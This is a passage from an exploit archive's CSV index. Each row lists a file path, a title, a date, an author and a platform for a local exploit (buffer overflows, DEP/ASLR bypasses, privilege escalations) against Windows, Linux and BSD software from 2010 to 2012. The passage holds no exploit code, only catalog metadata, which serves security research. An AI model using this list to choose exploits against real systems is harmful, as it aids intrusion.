Index Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,local,windows, +16632,exploits/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16633,exploits/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16634,exploits/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16636,exploits/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16637,exploits/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,local,windows, +16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16642,exploits/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Local Buffer Overflow (Metasploit) (2)",2010-11-11,Metasploit,local,windows, +16643,exploits/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16644,exploits/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Local Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,local,windows, +16645,exploits/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16646,exploits/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, +16648,exploits/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16652,exploits/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16653,exploits/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,local,windows, +16654,exploits/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,local,windows, +16655,exploits/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16656,exploits/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Local Buffer Overflow (Metasploit)",2010-12-16,Metasploit,local,windows, +16658,exploits/windows/local/16658.rb,"VUPlayer - '.cue' Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16659,exploits/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,local,aix, +16660,exploits/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,local,windows, +16662,exploits/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16663,exploits/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Local Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16664,exploits/windows/local/16664.rb,"gAlan 0.2.1 - Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16665,exploits/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,local,windows, +16666,exploits/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, +16667,exploits/windows/local/16667.rb,"Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit)",2010-11-01,Metasploit,local,windows, +16668,exploits/windows/local/16668.rb,"BACnet OPC Client - Local Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,local,windows, +16669,exploits/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16670,exploits/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16671,exploits/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering (Metasploit)",2010-12-16,Metasploit,local,windows, +16672,exploits/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16673,exploits/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16674,exploits/windows/local/16674.rb,"Adobe - 'Collab.collectEmailInfo()' Local Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows, +16677,exploits/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows, +16678,exploits/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,win_x86, +16679,exploits/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,local,windows, +16680,exploits/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Local Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16681,exploits/windows/local/16681.rb,"Adobe - 'Collab.getIcon()' Local Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16682,exploits/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript) (Metasploit)",2010-12-16,Metasploit,local,windows, +16683,exploits/windows/local/16683.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,local,windows, +16684,exploits/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, +16686,exploits/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,local,windows, +16687,exploits/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,local,windows, +16688,exploits/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,local,windows, +16940,exploits/windows/local/16940.c,".NET Runtime Optimization Service - Local Privilege Escalation",2011-03-08,XenoMuta,local,windows, +16942,exploits/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Local Buffer Overflow",2011-03-08,KedAns-Dz,local,windows, +16951,exploits/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,local,bsd, +16965,exploits/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",local,windows, +16971,exploits/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Local Buffer Overflow",2011-03-14,Rh0,local,windows, +16976,exploits/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Local Buffer Overflow (SEH)",2011-03-14,h1ch4m,local,windows, +16977,exploits/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Local Buffer Overflow",2011-03-14,h1ch4m,local,windows, +16978,exploits/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,local,windows, +16991,exploits/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,local,windows, +16999,exploits/windows/local/16999.rb,"POP Peeper 3.7 - Local Overflow (SEH)",2011-03-18,"Anastasios Monachos",local,windows, +17001,exploits/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Local Buffer Overflow",2011-03-18,Rh0,local,windows, +17012,exploits/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow",2011-03-20,"Oh Yaw Theng",local,windows, +17013,exploits/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",local,windows, +17064,exploits/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,local,windows, +17083,exploits/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,local,linux, +17086,exploits/windows/local/17086.pl,"Word List Builder - Local Buffer Overflow (SEH)",2011-04-01,h1ch4m,local,windows, +17124,exploits/windows/local/17124.pl,"MPlayer (r33064 Lite) - Local Buffer Overflow (ROP)",2011-04-06,Nate_M,local,windows, +17196,exploits/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - 'ElonFmt.ocx' pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,local,windows, +17144,exploits/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Local Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",local,windows, +17147,exploits/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,local,linux, +17150,exploits/windows/local/17150.rb,"AOL Desktop 9.6 - RTX Buffer Overflow (Metasploit)",2011-04-08,Metasploit,local,windows, +17153,exploits/windows/local/17153.rb,"VeryTools VideoSpirit Pro 1.70 - '.visprj' Local Buffer Overflow (Metasploit)",2011-04-11,Metasploit,local,windows, +17157,exploits/windows/local/17157.py,"Wordtrainer 3.0 - '.ord' Local Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",local,windows, +17158,exploits/windows/local/17158.txt,"Microsoft HTML Help 6.1 - Local Stack Overflow",2011-04-12,"Luigi Auriemma",local,windows, +17166,exploits/windows/local/17166.py,"PlaylistMaker 1.5 - '.txt' Local Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",local,windows, +17169,exploits/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,local,bsd, +17171,exploits/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Local Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",local,windows, +17177,exploits/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",local,windows, +17185,exploits/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - Local Overflow (SEH)",2011-04-18,sickness,local,windows, +17186,exploits/windows/local/17186.rb,"Wireshark 1.4.4 - 'packet-dect.c' Local Stack Buffer Overflow (Metasploit) (1)",2011-04-19,Metasploit,local,windows, +17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows, +17223,exploits/windows/local/17223.pl,"NetOp Remote Control 8.0/9.1/9.2/9.5 - Local Buffer Overflow",2011-04-28,chap0,local,windows, +17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows, +17229,exploits/windows/local/17229.rb,"MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,local,windows, +17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,local,windows, +17317,exploits/windows/local/17317.rb,"VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit)",2011-05-23,Metasploit,local,windows, +17318,exploits/multiple/local/17318.php,"PHP 5.3.5 - 'socket_connect()' Local Buffer Overflow",2011-05-25,"Marek Kroemeke",local,multiple, +17270,exploits/windows/local/17270.pl,"Chasys Media Player 2.0 - Local Buffer Overflow (SEH)",2011-05-11,h1ch4m,local,windows, +17277,exploits/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,local,windows, +17275,exploits/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,local,windows, +17294,exploits/windows/local/17294.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow",2011-05-16,sinfulsecurity,local,windows, +17302,exploits/windows/local/17302.py,"Sonique 1.96 - '.m3u' Local Buffer Overflow",2011-05-17,sinfulsecurity,local,windows, +17306,exploits/windows/local/17306.pl,"SpongeBob SquarePants Typing - Local Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",local,windows, +17313,exploits/windows/local/17313.rb,"Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Metasploit)",2011-05-22,Metasploit,local,windows, +17329,exploits/windows/local/17329.rb,"Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Without EggHunter) (Metasploit)",2011-05-27,"Alexey Sintsov",local,windows, +17362,exploits/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous",local,windows, +17364,exploits/windows/local/17364.py,"The KMPlayer 3.0.0.1440 (Windows XP SP3) - '.mp3' File Buffer Overflow (DEP Bypass)",2011-06-06,"dookie & ronin",local,windows, +17383,exploits/windows/local/17383.py,"The KMPlayer 3.0.0.1440 (Windows 7) - '.mp3' Local Buffer Overflow (ASLR Bypass)",2011-06-11,xsploitedsec,local,windows, +17391,exploits/linux/local/17391.c,"Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation",2011-06-11,"Dan Rosenberg",local,linux, +17441,exploits/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow",2011-06-23,"Iván García Ferreira",local,windows, +17449,exploits/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Local Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",local,windows, +17451,exploits/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll .DXF' File Handling (MS10-028) (Metasploit)",2011-06-26,Metasploit,local,windows, +17459,exploits/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,local,windows, +17473,exploits/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion",2011-07-03,Snake,local,windows, +17474,exploits/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,local,windows, +17486,exploits/multiple/local/17486.php,"PHP 5.3.6 - Local Buffer Overflow (ROP) (PoC)",2011-07-04,"Jonathan Salwan",local,multiple, +17488,exploits/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,local,windows, +17489,exploits/windows/local/17489.rb,"Word List Builder 1.0 - Local Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",local,windows, +17492,exploits/windows/local/17492.rb,"Wordtrainer 3.0 - '.ord' Local Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",local,windows, +17499,exploits/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",local,windows, +17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,local,windows, +17511,exploits/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Local Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",local,windows, +40085,exploits/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,local,windows, +17561,exploits/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,local,windows, +17563,exploits/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",local,windows, +17565,exploits/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Local Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 & h1ch4m",local,windows, +17600,exploits/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 & h1ch4m",local,windows, +17604,exploits/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows, +17605,exploits/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows, +17607,exploits/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows, +17611,exploits/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow",2011-08-05,ZadYree,local,linux, +17634,exploits/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",local,windows, +17647,exploits/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",local,windows, +17654,exploits/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",local,windows, +17665,exploits/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass",2011-08-13,"C4SS!0 G0M3S",local,windows, +17715,exploits/windows/local/17715.html,"F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH)",2011-08-24,41.w4r10r,local,windows, +17727,exploits/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,local,windows, +17732,exploits/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",local,windows, +17735,exploits/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",local,windows, +17744,exploits/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",local,windows, +17745,exploits/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",local,windows, +17754,exploits/windows/local/17754.c,"DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal (ASLR + DEP Bypass)",2011-08-30,sickness,local,windows, +17770,exploits/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,local,windows, +17787,exploits/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",local,linux, +17777,exploits/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,local,windows, +17780,exploits/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,local,windows, +17783,exploits/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",local,windows, +17788,exploits/windows/local/17788.py,"DVD X Player 5.5 Pro - Overwrite (SEH)",2011-09-06,blake,local,windows, +17803,exploits/windows/local/17803.php,"DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass)",2011-09-08,Rew,local,windows, +17817,exploits/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow",2011-09-12,mr_me,local,windows, +17820,exploits/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,local,windows, +17821,exploits/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Local Buffer Overflow",2011-09-12,"Iván García Ferreira",local,windows, +17833,exploits/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Local Stack Buffer Overflow (Metasploit)",2011-09-13,Metasploit,local,windows, +17847,exploits/windows/local/17847.py,"Mini-stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,local,windows, +17854,exploits/windows/local/17854.py,"MY MP3 Player 3.0 - '.m3u' DEP Bypass",2011-09-17,blake,local,windows, +17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,local,windows, +17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows, +17892,exploits/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",local,windows, +17893,exploits/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,local,windows, +17902,exploits/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Local Privilege Escalation",2011-09-28,Xst3nZ,local,windows, +17932,exploits/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Local Privilege Escalation",2011-10-05,zx2c4,local,linux, +17939,exploits/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,local,windows, +17942,exploits/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,local,linux, +17966,exploits/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,local,windows, +17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,local,windows, +17985,exploits/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,local,windows, +18040,exploits/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,local,linux, +18027,exploits/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Local Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,local,windows, +18038,exploits/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Local Buffer Overflow (Metasploit)",2011-10-26,Metasploit,local,windows, +18064,exploits/linux/local/18064.sh,"Calibre E-Book Reader - Local Privilege Escalation (1)",2011-11-02,zx2c4,local,linux, +18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows, +18071,exploits/linux/local/18071.sh,"Calibre E-Book Reader - Local Privilege Escalation (2)",2011-11-03,zx2c4,local,linux, +18072,exploits/linux/local/18072.sh,"Calibre E-Book Reader - Race Condition Privilege Escalation",2011-11-03,zx2c4,local,linux, +18080,exploits/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak",2011-11-04,"Todor Donev",local,linux, +18082,exploits/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)",2011-11-04,Metasploit,local,windows, +18086,exploits/linux/local/18086.c,"Calibre E-Book Reader - Local Privilege Escalation (3)",2011-11-05,zx2c4,local,linux, +18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows, +18096,exploits/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Local Stack Buffer Overflow",2011-11-09,modpr0be,local,windows, +18105,exploits/linux/local/18105.sh,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,local,linux, +18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,local,windows, +18113,exploits/windows/local/18113.rb,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2011-11-14,Metasploit,local,windows, +18137,exploits/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,local,win_x86, +18142,exploits/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)",2011-11-22,Metasploit,local,windows, +18143,exploits/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,local,windows, +18147,exploits/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,local,linux, +18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows, +18176,exploits/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)",2011-11-30,ryujin,local,windows, +18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,local,windows, +18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",local,windows, +18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows, +18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,local,windows, +18201,exploits/windows/local/18201.txt,"SopCast 3.4.7 - 'Diagnose.exe' Improper Permissions",2011-12-05,LiquidWorm,local,windows, +18228,exploits/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,local,linux, +18258,exploits/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",local,windows, +18334,exploits/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",local,windows, +18349,exploits/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,local,windows, +18372,exploits/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",local,windows, +18375,exploits/windows/local/18375.rb,"BS.Player 2.57 - Local Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,local,windows, +18366,exploits/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,local,windows, +18411,exploits/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)",2012-01-23,zx2c4,local,linux, +18471,exploits/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez & David Mora",local,windows, +18500,exploits/windows/local/18500.py,"Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow",2012-02-20,b33f,local,windows, +18501,exploits/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,local,windows, +18515,exploits/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,local,windows, +18547,exploits/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,local,windows, +18533,exploits/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Local Buffer Overflow",2012-02-27,Vulnerability-Lab,local,windows, +18548,exploits/windows/local/18548.rb,"VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,local,windows, +18611,exploits/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Local Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,local,windows, +18656,exploits/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows, +18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows, +18681,exploits/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Local Buffer Overflow",2012-03-30,Vulnerability-Lab,local,windows, +18693,exploits/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - Local Overflow (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,local,windows, 